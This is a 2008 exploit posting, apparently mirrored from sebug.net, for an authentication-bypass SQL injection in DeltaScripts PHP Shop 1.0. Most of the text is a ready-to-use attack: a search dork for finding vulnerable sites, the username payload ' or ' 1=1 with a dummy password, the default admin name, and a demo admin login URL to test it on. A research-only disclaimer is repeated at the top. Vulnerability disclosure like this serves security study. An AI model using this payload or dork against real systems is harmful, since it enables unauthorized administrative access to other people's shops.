DeltaScripts PHP Shop 1.0 (Auth Bypass) SQL Injection Vulnerability
Published:2008-11-06
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
[~] deltascripts phpShop Remote Auth Bypass Vulnerability [~] [~] ---------------------------------------------------------- [~] Discovered By: ZoRLu [~] [~] Date: 06.11.2008 [~] [~] Home: www.z0rlu.blogspot.com [~] [~] contact: trt-turk@hotmail.com [~] [~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( [~] [~] dork: "Powered by PHP Shop from DeltaScripts" [~] [~] ----------------------------------------------------------- Exploit: username: [real_admin_name] ' or ' 1=1 password: ZoRLu note: generally admin name: admin admin login for demo: http://demo.deltascripts.com/phpshop/admin/login.php example for demo: admin: admin ' or ' 1=1 passwd: ZoRLu [~]---------------------------------------------------------------------- [~] Greetz tO: str0ke & all Muslim HaCkeRs [~] [~] yildirimordulari.org & darkc0de.com [~] [~]----------------------------------------------------------------------
// Sebug.net [ 2008-11-07 ]